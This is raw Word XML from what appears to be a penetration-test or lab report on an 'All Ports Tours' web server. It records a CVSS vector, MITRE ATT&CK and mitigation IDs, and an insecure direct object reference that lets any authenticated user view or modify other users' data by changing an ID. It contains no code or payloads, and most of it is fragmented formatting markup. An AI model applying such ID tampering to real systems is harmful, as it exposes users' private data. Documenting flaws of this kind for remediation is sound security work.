                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>.3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45E074E7" w:rsidP="0D325B6E" w:rsidRDefault="45E074E7" w14:paraId="208EBFA5" w14:textId="6B69A14A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="45E074E7">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59AF5F1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C337DC" w14:textId="3C0F958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0D2CD2F" w14:textId="7D70090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0E3F48E3"/>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C925485"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0469C1D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B8A7B24" w14:textId="74B78C5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84E5C30" w:rsidP="0D325B6E" w:rsidRDefault="384E5C30" w14:paraId="742250BE" w14:textId="5C39AFAD">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="R5e5161b43b734b33">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="384E5C30">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N/AC:L/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1EFC48BA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="384E5C30">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>A:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="72BBBEE6">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8FBCB0" w14:textId="2BAD058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B6649D7" w:rsidP="0D325B6E" w:rsidRDefault="3B6649D7" w14:paraId="0F53F6D0" w14:textId="251F9EB1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="3B6649D7">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24C7491" w:rsidP="0D325B6E" w:rsidRDefault="024C7491" w14:paraId="725CBB20" w14:textId="1E6EBA94">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R900616888b93453a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="024C7491">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1567</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="00F67F35">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="765F7111">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2B1D40FC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Exfiltration</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="024C7491">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765F7111">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Over Web Service</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="024C7491" w:rsidP="0D325B6E" w:rsidRDefault="024C7491" w14:paraId="11676936" w14:textId="0ED62B75">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R901aa7e0ab894bb5">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="024C7491">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1213</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1018EFF3">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2B108919">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Data from Information Repositories</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2A7A9400">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A90B25C"/>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27C6283" w:rsidP="0D325B6E" w:rsidRDefault="027C6283" w14:paraId="22F8EA3A" w14:textId="5395ABC6">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="027C6283">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429F139" w:rsidP="0D325B6E" w:rsidRDefault="2429F139" w14:paraId="50611DBE" w14:textId="59D58C59">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R89fa7c1be4144dfb">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2429F139">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M0801: Access Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="2429F139" w:rsidP="0D325B6E" w:rsidRDefault="2429F139" w14:paraId="240E4B7E" w14:textId="45B1DC92">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3b306c5da7ae4327">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2429F139">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M0800: Authorization Enforcement</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5A44D06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C583E2C" w14:textId="104D598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3631C43" w14:textId="6CDB43D2">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3A6534DA" w14:textId="09F50F81">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="22B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="11759344" w14:textId="4868CBA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2B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="077C7FC7" w14:textId="2264B8B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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The machine hosts a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C16BBCE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> webserver that </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 xml:space="preserve">exposes object identifiers (ID) in URLs or API parameters and relies on those client-supplied IDs to return user data. No </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authorization</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checks</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 xml:space="preserve"> are done</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4B86A545">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82AB43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F0D63D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meaning</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 that any authenticated user</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 can</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odif</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or retrieve the identifier, allowing users to act on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="781B309D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>behalf</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="674B86A3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of all other users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="574DB06E" w14:textId="0887824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2B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="11413B5C" w14:textId="5145FBE8">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2B3E09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CE1F86C" w:rsidP="0D325B6E" w:rsidRDefault="3CE1F86C" w14:paraId="7698E9C5" w14:textId="10E2AA38">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E1F86C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="49550E2D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the leakage of sensitive data, which can hurt the public reputation of All Ports Tours and lead to fines. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67110288">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C150061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2DDA1C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2DDA1C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6711028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DDA1C54">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2DDA1C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>odify</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2DDA1C5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7110288">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sensitive data of all other users, resulting in</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5E0DFE4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E0DFE48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signif</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0DBEE02E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ic</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5E0DFE48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ant</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5E0DFE4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7110288">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67110288">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onfidentiality and integrity impact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1CA9B18A" w14:textId="3AE6CB87">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22B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="3763A191" w14:textId="71F3232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2B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="11A3A61C" w14:textId="326FBA9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the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4AD7FB64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="1998CEC5" w14:textId="7DE90D4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350641E4">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350641E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0245C269">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="350641E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50641E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">number in the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46E1CC55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
